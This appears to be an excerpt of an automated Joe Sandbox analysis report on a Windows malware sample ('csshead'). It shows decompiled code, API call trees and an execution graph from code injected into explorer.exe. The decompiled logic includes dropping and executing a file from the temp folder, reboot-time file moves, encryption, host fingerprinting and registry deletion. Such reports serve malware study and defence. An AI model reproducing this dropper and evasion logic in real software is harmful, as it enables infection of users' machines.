    0x00407738
    0x0040774c
    0x00407754
    0x00407761
    0x00407766
    0x00407766
    0x00407770
    0x0040789e
    0x004078a5
    0x004078a7
    0x004078ab
    0x004078c4
    0x004078ca
    0x004078d0
    0x00000000
    0x004078da
    0x00407776
    0x00407781
    0x00407788
    0x0040778a
    0x0040778e
    0x00407798
    0x0040779f
    0x004077a5
    0x004077ab
    0x00000000
    0x004077b5
    0x004077ca
    0x004077d5
    0x004077da
    0x004077f0
    0x004077e5
    0x004077ea
    0x004077ea
    0x004077ed
    0x004077ed
    0x004077fc
    0x00407809
    0x004077fe
    0x004077fe
    0x004077fe
    0x0040780f
    0x0040781d
    0x00407828
    0x00407833
    0x00407841
    0x00407857
    0x00407864
    0x00407875
    0x0040787b
    0x00407881
    0x00000000
    0x0040788c
    0x00407864
    0x0040778e
    0x00407770
    0x004078e2

    APIs
      • Part of subcall function 00403FC8: CoInitialize.OLE32(00000000), ref: 00404001
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00404089
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 004040A7
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • MoveFileExA.KERNEL32(?,0040B518,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00407857
      • Part of subcall function 00404968: SHGetValueA.SHLWAPI(?,00401DAC,?,00000001,00000000,?), ref: 004049B1
      • Part of subcall function 00404968: RegOpenKeyExA.ADVAPI32(?,00401DAC,00000000,000F003F,?), ref: 004049D0
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 0040763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
      • Part of subcall function 0040763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
      • Part of subcall function 0040763C: CloseHandle.KERNEL32(000000FF), ref: 0040768A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042CAB5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129
    APIs
    • _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • _strlen.LIBCMT ref: 0042CB10
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
      • Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004287A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97LIBRARYCODE
    APIs
      • Part of subcall function 00428185: __fltout2.LIBCMT ref: 004281B4
    • __fltout2.LIBCMT ref: 004287D1
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042885E
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00428185, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84LIBRARYCODE
    APIs
    • __fltout2.LIBCMT ref: 004281B4
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004286E5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80LIBRARYCODE
    APIs
    • __fltout2.LIBCMT ref: 00428710
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042878F
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E470, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77
    APIs
    • SelectObject.GDI32(?,00000000), ref: 0041E504
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00407D3C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
    C-Code - Quality: 100%
    			E00407D3C(void* __eax, void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v85;
				char _v342;
				void* _t34;
				intOrPtr _t42;
				void* _t55;
				intOrPtr _t58;

				_t55 = __ecx;
				_v8 = __eax;
				_v342 = 0;
				GetTempPathA(0x101,  &_v342);
				_v12 = _v8;
				_v16 = 0;
				while(1) {
					_t34 = _v12;
					if( *_t34 == 0) {
						break;
					}
					__eflags =  *_v12 - 0x2f;
					if( *_v12 == 0x2f) {
						_v16 = _v12;
					}
					_t10 =  &_v12;
					 *_t10 = _v12 + 1;
					__eflags =  *_t10;
				}
				if(_v16 != 0) {
					_v16 = _v16 + 1;
					E0040133C( &_v342, _v16);
					if(E00403C28(_v8, _t55,  &_v342) == 0) {
						_t42 =  *0x40a170; // 0x401e04
						return E00407240(_t42, __eflags);
					}
					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
					_v20 = _t34;
					_t66 = _v20 - 0x20;
					if(_v20 <= 0x20) {
						E00401864(_v20,  &_v85);
						_t58 =  *0x40a16c; // 0x401df8
						E00401308( &_v342, _t58);
						E0040133C( &_v342,  &_v85);
						return E00407240( &_v342, _t66);
					}
				}
				return _t34;
			}













    0x00407d3c
    0x00407d45
    0x00407d48
    0x00407d5b
    0x00407d64
    0x00407d69
    0x00407d7f
    0x00407d7f
    0x00407d85
    0x00000000
    0x00000000
    0x00407d71
    0x00407d74
    0x00407d79
    0x00407d79
    0x00407d7c
    0x00407d7c
    0x00407d7c
    0x00407d7c
    0x00407d8b
    0x00407d91
    0x00407d9f
    0x00407db7
    0x00407e1a
    0x00000000
    0x00407e1f
    0x00407dca
    0x00407dd0
    0x00407dd3
    0x00407dd7
    0x00407de1
    0x00407def
    0x00407df5
    0x00407e05
    0x00000000
    0x00407e13
    0x00407dd7
    0x00407e27

    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 00407D5B
      • Part of subcall function 00403C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
      • Part of subcall function 00403C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
      • Part of subcall function 00403C28: CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00407DCA
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042A8D8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42LIBRARYCODE
    APIs
    • _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 00423F05: RtlUnwind.KERNEL32(00423F30,0?B,?,00000000), ref: 00423F2B
      • Part of subcall function 0042A2CD: __getptd.LIBCMT ref: 0042A2F4
      • Part of subcall function 0042A2CD: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042A340
      • Part of subcall function 0042A52B: __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A56B
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A579
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A584
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00425DBE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40LIBRARYCODE
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259D7
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259E4
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259F1
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 004259FE
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A0B
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A27
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(00000000), ref: 00425A37
      • Part of subcall function 004259C5: InterlockedIncrement.KERNEL32(?), ref: 00425A4D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E180, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37string
    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0041E1A6
    • InterlockedDecrement.KERNEL32(?), ref: 0041E1CA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042A651, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37LIBRARYCODE
    APIs
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424204
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424214
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424225
    • __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A66E
      • Part of subcall function 004241D7: __getptd.LIBCMT ref: 004241DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004164F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36library
    APIs
      • Part of subcall function 00414E70: CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
      • Part of subcall function 00414E70: DeleteObject.GDI32(?), ref: 00414EE6
      • Part of subcall function 00414E70: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
      • Part of subcall function 00414E70: GetCurrentThreadId.KERNEL32 ref: 00414F1A
      • Part of subcall function 00414E70: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
      • Part of subcall function 00414E70: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
      • Part of subcall function 00414E70: UnhookWindowsHookEx.USER32(00000000), ref: 00414F93
      • Part of subcall function 00414E70: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D
    • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 0041652A
    • FreeLibrary.KERNEL32(?), ref: 0041654E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042B105, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
    APIs
    • RtlEnterCriticalSection.NTDLL(?), ref: 0042B13D
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Analysis Process: explorer.exe PID: 3160 Parent PID: 2092

    Execution Graph

    Execution Coverage:35.2%
    Dynamic/Decrypted Code Coverage:99.9%
    Signature Coverage:8.6%
    Total number of Nodes:1808
    Total number of Limit Nodes:21

    Graph

    execution_graph 5054 7c6db0 5055 7c6dd1 5054->5055 5057 7c6dbe 5054->5057 5056 7c6dd3 Sleep GetTickCount 5055->5056 5057->5056 5058 7c6dc8 GetTickCount 5057->5058 5058->5055 5406 7c1aae 5407 7c1ab0 5406->5407 5408 7c1aee 5407->5408 5409 7c1ac9 CryptEncrypt 5407->5409 5409->5408 5059 7c4b9b 5060 7c4ba0 GetComputerNameA 5059->5060 5061 7c4beb RegOpenKeyExA 5060->5061 5062 7c4bcd 5060->5062 5074 7c38b0 RegQueryValueExA 5061->5074 5062->5061 5064 7c4c2c 5075 7c38b0 RegQueryValueExA 5064->5075 5067 7c4c76 5076 7c38b0 RegQueryValueExA 5067->5076 5069 7c4cc0 5077 7c38b0 RegQueryValueExA 5069->5077 5070 7c4d0c 5078 7c3890 RegCloseKey 5070->5078 5072 7c4d17 GetVolumeInformationA 5073 7c4d60 5072->5073 5074->5064 5075->5067 5076->5069 5077->5070 5078->5072 5079 7c7278 5080 7c7240 36 API calls 5079->5080 5081 7c7283 RtlExitUserThread 5080->5081 5082 7c80be 5083 7c80c0 5082->5083 5084 7c80e1 CreateEventA WaitForSingleObject CloseHandle 5083->5084 5085 7c80d5 RtlRemoveVectoredExceptionHandler 5083->5085 5086 7c8128 5084->5086 5085->5084 5087 7c471c 17 API calls 5086->5087 5088 7c815d 5087->5088 5089 7c471c 17 API calls 5088->5089 5090 7c816f 5089->5090 5091 7c8178 SendMessageA 5090->5091 5092 7c818a 5090->5092 5091->5092 5093 7c81d3 5092->5093 5094 7c8193 5092->5094 5095 7c81f0 SHDeleteKeyA 5093->5095 5096 7c81d9 5093->5096 5097 7c81b0 SHDeleteKeyA 5094->5097 5098 7c8199 5094->5098 5099 7c81ee 5095->5099 5100 7c8064 3 API calls 5096->5100 5105 7c81ae 5097->5105 5101 7c8064 3 API calls 5098->5101 5102 7c81d1 5099->5102 5103 7c4a1c 3 API calls 5099->5103 5100->5099 5101->5105 5110 7c1828 VirtualFree 5102->5110 5103->5102 5104 7c4a1c 3 API calls 5104->5102 5105->5104 5107 7c821b ReleaseMutex CloseHandle 5108 7c824a 5107->5108 5109 7c8242 ExitProcess 5107->5109 5110->5107 5410 7c9230 5411 7c9232 5410->5411 5412 7c9254 Sleep 5411->5412 5413 7c9268 5411->5413 5412->5413 5421 7c6e04 GetModuleFileNameA CharUpperBuffA 5413->5421 5416 7c92bb 5417 7c92b3 5419 7c69bc 12 API calls 5417->5419 5418 7c9285 OpenMutexA 5418->5417 5420 7c92a1 CloseHandle ExitProcess 5418->5420 5419->5416 5422 7c3f38 2 API calls 5421->5422 5423 7c6e47 5422->5423 5434 7c1440 GetProcessHeap HeapFree 5423->5434 5425 7c6e6b 5426 7c3f38 2 API calls 5425->5426 5427 7c6e75 5426->5427 5435 7c1440 GetProcessHeap HeapFree 5427->5435 5429 7c6e99 5430 7c3f38 2 API calls 5429->5430 5431 7c6ea3 5430->5431 5436 7c1440 GetProcessHeap HeapFree 5431->5436 5433 7c6ec7 5433->5416 5433->5417 5433->5418 5434->5425 5435->5429 5436->5433 5111 7c3f36 5112 7c3f38 5111->5112 5115 7c13dc GetProcessHeap RtlAllocateHeap 5112->5115 5114 7c3f6c 5115->5114 5116 7c4133 5117 7c4154 GetKeyboardLayoutList 5116->5117 5118 7c4178 5117->5118 3939 7c9080 3940 7c9091 3939->3940 3945 7c2574 3940->3945 4537 7c24f8 GetPEB 3945->4537 3950 7c1994 2 API calls 3951 7c25a4 3950->3951 3952 7c1994 2 API calls 3951->3952 3953 7c25b6 3952->3953 3954 7c1994 2 API calls 3953->3954 3955 7c25c8 3954->3955 3956 7c1994 2 API calls 3955->3956 3957 7c25da 3956->3957 3958 7c1994 2 API calls 3957->3958 3959 7c25ec 3958->3959 3960 7c1994 2 API calls 3959->3960 3961 7c25fe 3960->3961 3962 7c1994 2 API calls 3961->3962 3963 7c2610 3962->3963 3964 7c1994 2 API calls 3963->3964 3965 7c2622 3964->3965 3966 7c1994 2 API calls 3965->3966 3967 7c2634 3966->3967 3968 7c1994 2 API calls 3967->3968 3969 7c2646 3968->3969 3970 7c1994 2 API calls 3969->3970 3971 7c2658 3970->3971 3972 7c1994 2 API calls 3971->3972 3973 7c266a 3972->3973 3974 7c1994 2 API calls 3973->3974 3975 7c267c 3974->3975 3976 7c1994 2 API calls 3975->3976 3977 7c268e 3976->3977 3978 7c1994 2 API calls 3977->3978 3979 7c26a0 3978->3979 3980 7c1994 2 API calls 3979->3980 3981 7c26b2 3980->3981 3982 7c1994 2 API calls 3981->3982 3983 7c26c4 3982->3983 3984 7c1994 2 API calls 3983->3984 3985 7c26d6 3984->3985 3986 7c1994 2 API calls 3985->3986 3987 7c26e8 3986->3987 3988 7c1994 2 API calls 3987->3988 3989 7c26fa 3988->3989 3990 7c1994 2 API calls 3989->3990 3991 7c270c 3990->3991 3992 7c1994 2 API calls 3991->3992 3993 7c271e 3992->3993 3994 7c1994 2 API calls 3993->3994 3995 7c2730 3994->3995 3996 7c1994 2 API calls 3995->3996 3997 7c2742 3996->3997 3998 7c1994 2 API calls 3997->3998 3999 7c2754 3998->3999 4000 7c1994 2 API calls 3999->4000 4001 7c2766 4000->4001 4002 7c1994 2 API calls 4001->4002 4003 7c2778 4002->4003 4004 7c1994 2 API calls 4003->4004 4005 7c278a 4004->4005 4006 7c1994 2 API calls 4005->4006 4007 7c279c 4006->4007 4008 7c1994 2 API calls 4007->4008 4009 7c27ae 4008->4009 4010 7c1994 2 API calls 4009->4010 4011 7c27c0 4010->4011 4012 7c1994 2 API calls 4011->4012 4013 7c27d2 4012->4013 4014 7c1994 2 API calls 4013->4014 4015 7c27e4 4014->4015 4016 7c1994 2 API calls 4015->4016 4017 7c27f6 4016->4017 4018 7c1994 2 API calls 4017->4018 4019 7c2808 4018->4019 4020 7c1994 2 API calls 4019->4020 4021 7c281a 4020->4021 4022 7c1994 2 API calls 4021->4022 4023 7c282c 4022->4023 4024 7c1994 2 API calls 4023->4024 4025 7c283e 4024->4025 4026 7c1994 2 API calls 4025->4026 4027 7c2850 4026->4027 4028 7c1994 2 API calls 4027->4028 4029 7c2862 4028->4029 4030 7c1994 2 API calls 4029->4030 4031 7c2874 4030->4031 4032 7c1994 2 API calls 4031->4032 4033 7c2886 4032->4033 4034 7c1994 2 API calls 4033->4034 4035 7c2898 4034->4035 4036 7c1994 2 API calls 4035->4036 4037 7c28aa 4036->4037 4038 7c1994 2 API calls 4037->4038 4039 7c28bc 4038->4039 4040 7c1994 2 API calls 4039->4040 4041 7c28ce 4040->4041 4042 7c1994 2 API calls 4041->4042 4043 7c28e0 4042->4043 4044 7c1994 2 API calls 4043->4044 4045 7c28f2 4044->4045 4046 7c1994 2 API calls 4045->4046 4047 7c2904 4046->4047 4048 7c1994 2 API calls 4047->4048 4049 7c2916 4048->4049 4050 7c1994 2 API calls 4049->4050 4051 7c2928 4050->4051 4052 7c1994 2 API calls 4051->4052 4053 7c293a 4052->4053 4054 7c1994 2 API calls 4053->4054 4055 7c294c 4054->4055 4056 7c1994 2 API calls 4055->4056 4057 7c295e 4056->4057 4058 7c1994 2 API calls 4057->4058 4059 7c2970 4058->4059 4060 7c1994 2 API calls 4059->4060 4061 7c2982 4060->4061 4062 7c1994 2 API calls 4061->4062 4063 7c2994 4062->4063 4064 7c1994 2 API calls 4063->4064 4065 7c29a6 4064->4065 4066 7c1994 2 API calls 4065->4066 4067 7c29b8 4066->4067 4068 7c1994 2 API calls 4067->4068 4069 7c29ca 4068->4069 4070 7c1994 2 API calls 4069->4070 4071 7c29dc 4070->4071 4072 7c1994 2 API calls 4071->4072 4073 7c29ee 4072->4073 4074 7c1994 2 API calls 4073->4074 4075 7c2a00 4074->4075 4076 7c1994 2 API calls 4075->4076 4077 7c2a12 4076->4077 4078 7c1994 2 API calls 4077->4078 4079 7c2a24 4078->4079 4080 7c1994 2 API calls 4079->4080 4081 7c2a36 4080->4081 4082 7c1994 2 API calls 4081->4082 4083 7c2a48 4082->4083 4084 7c1994 2 API calls 4083->4084 4085 7c2a5a 4084->4085 4086 7c1994 2 API calls 4085->4086 4087 7c2a6c 4086->4087 4088 7c1994 2 API calls 4087->4088 4089 7c2a7e 4088->4089 4090 7c1994 2 API calls 4089->4090 4091 7c2a90 4090->4091 4092 7c1994 2 API calls 4091->4092 4093 7c2aa2 4092->4093 4094 7c1994 2 API calls 4093->4094 4095 7c2ab4 4094->4095 4096 7c1994 2 API calls 4095->4096 4097 7c2ac6 4096->4097 4098 7c1994 2 API calls 4097->4098 4099 7c2ad8 4098->4099 4100 7c1994 2 API calls 4099->4100 4101 7c2aea 4100->4101 4102 7c1994 2 API calls 4101->4102 4103 7c2afc 4102->4103 4104 7c1994 2 API calls 4103->4104 4105 7c2b0e 4104->4105 4106 7c1994 2 API calls 4105->4106 4107 7c2b20 4106->4107 4108 7c1994 2 API calls 4107->4108 4109 7c2b32 4108->4109 4110 7c1994 2 API calls 4109->4110 4111 7c2b44 4110->4111 4112 7c1994 2 API calls 4111->4112 4113 7c2b56 4112->4113 4114 7c1994 2 API calls 4113->4114 4115 7c2b68 4114->4115 4116 7c1994 2 API calls 4115->4116 4117 7c2b7a 4116->4117 4118 7c1994 2 API calls 4117->4118 4119 7c2b8c 4118->4119 4120 7c1994 2 API calls 4119->4120 4121 7c2b9e 4120->4121 4122 7c1994 2 API calls 4121->4122 4123 7c2bb0 4122->4123 4124 7c1994 2 API calls 4123->4124 4125 7c2bc2 4124->4125 4126 7c1994 2 API calls 4125->4126 4127 7c2bd4 4126->4127 4128 7c1994 2 API calls 4127->4128 4129 7c2be6 4128->4129 4130 7c1994 2 API calls 4129->4130 4131 7c2bf8 4130->4131 4132 7c1994 2 API calls 4131->4132 4133 7c2c0a 4132->4133 4134 7c1994 2 API calls 4133->4134 4135 7c2c1c 4134->4135 4136 7c1994 2 API calls 4135->4136 4137 7c2c2e 4136->4137 4138 7c1994 2 API calls 4137->4138 4139 7c2c40 4138->4139 4140 7c1994 2 API calls 4139->4140 4141 7c2c52 4140->4141 4142 7c1994 2 API calls 4141->4142 4143 7c2c64 4142->4143 4144 7c1994 2 API calls 4143->4144 4145 7c2c76 4144->4145 4146 7c1994 2 API calls 4145->4146 4147 7c2c88 4146->4147 4148 7c1994 2 API calls 4147->4148 4149 7c2c9a 4148->4149 4150 7c1994 2 API calls 4149->4150 4151 7c2cac 4150->4151 4152 7c1994 2 API calls 4151->4152 4153 7c2cbe 4152->4153 4154 7c1994 2 API calls 4153->4154 4155 7c2cd0 4154->4155 4156 7c1994 2 API calls 4155->4156 4157 7c2ce2 4156->4157 4158 7c1994 2 API calls 4157->4158 4159 7c2cf4 4158->4159 4160 7c1994 2 API calls 4159->4160 4161 7c2d06 4160->4161 4162 7c1994 2 API calls 4161->4162 4163 7c2d18 4162->4163 4164 7c1994 2 API calls 4163->4164 4165 7c2d2a 4164->4165 4166 7c1994 2 API calls 4165->4166 4167 7c2d3c 4166->4167 4168 7c1994 2 API calls 4167->4168 4169 7c2d4e LoadLibraryA 4168->4169 4170 7c1994 2 API calls 4169->4170 4171 7c2d6f 4170->4171 4172 7c1994 2 API calls 4171->4172 4173 7c2d81 4172->4173 4174 7c1994 2 API calls 4173->4174 4175 7c2d93 LoadLibraryA 4174->4175 4176 7c1994 2 API calls 4175->4176 4177 7c2db4 4176->4177 4178 7c1994 2 API calls 4177->4178 4179 7c2dc6 4178->4179 4180 7c1994 2 API calls 4179->4180 4181 7c2dd8 4180->4181 4182 7c1994 2 API calls 4181->4182 4183 7c2dea 4182->4183 4184 7c1994 2 API calls 4183->4184 4185 7c2dfc 4184->4185 4186 7c1994 2 API calls 4185->4186 4187 7c2e0e 4186->4187 4188 7c1994 2 API calls 4187->4188 4189 7c2e20 4188->4189 4190 7c1994 2 API calls 4189->4190 4191 7c2e32 4190->4191 4192 7c1994 2 API calls 4191->4192 4193 7c2e44 4192->4193 4194 7c1994 2 API calls 4193->4194 4195 7c2e56 4194->4195 4196 7c1994 2 API calls 4195->4196 4197 7c2e68 4196->4197 4198 7c1994 2 API calls 4197->4198 4199 7c2e7a 4198->4199 4200 7c1994 2 API calls 4199->4200 4201 7c2e8c 4200->4201 4202 7c1994 2 API calls 4201->4202 4203 7c2e9e 4202->4203 4204 7c1994 2 API calls 4203->4204 4205 7c2eb0 4204->4205 4206 7c1994 2 API calls 4205->4206 4207 7c2ec2 4206->4207 4208 7c1994 2 API calls 4207->4208 4209 7c2ed4 4208->4209 4210 7c1994 2 API calls 4209->4210 4211 7c2ee6 4210->4211 4212 7c1994 2 API calls 4211->4212 4213 7c2ef8 4212->4213 4214 7c1994 2 API calls 4213->4214 4215 7c2f0a 4214->4215 4216 7c1994 2 API calls 4215->4216 4217 7c2f1c 4216->4217 4218 7c1994 2 API calls 4217->4218 4219 7c2f2e 4218->4219 4220 7c1994 2 API calls 4219->4220 4221 7c2f40 4220->4221 4222 7c1994 2 API calls 4221->4222 4223 7c2f52 4222->4223 4224 7c1994 2 API calls 4223->4224 4225 7c2f64 4224->4225 4226 7c1994 2 API calls 4225->4226 4227 7c2f76 4226->4227 4228 7c1994 2 API calls 4227->4228 4229 7c2f88 4228->4229 4230 7c1994 2 API calls 4229->4230 4231 7c2f9a 4230->4231 4232 7c1994 2 API calls 4231->4232 4233 7c2fac 4232->4233 4234 7c1994 2 API calls 4233->4234 4235 7c2fbe 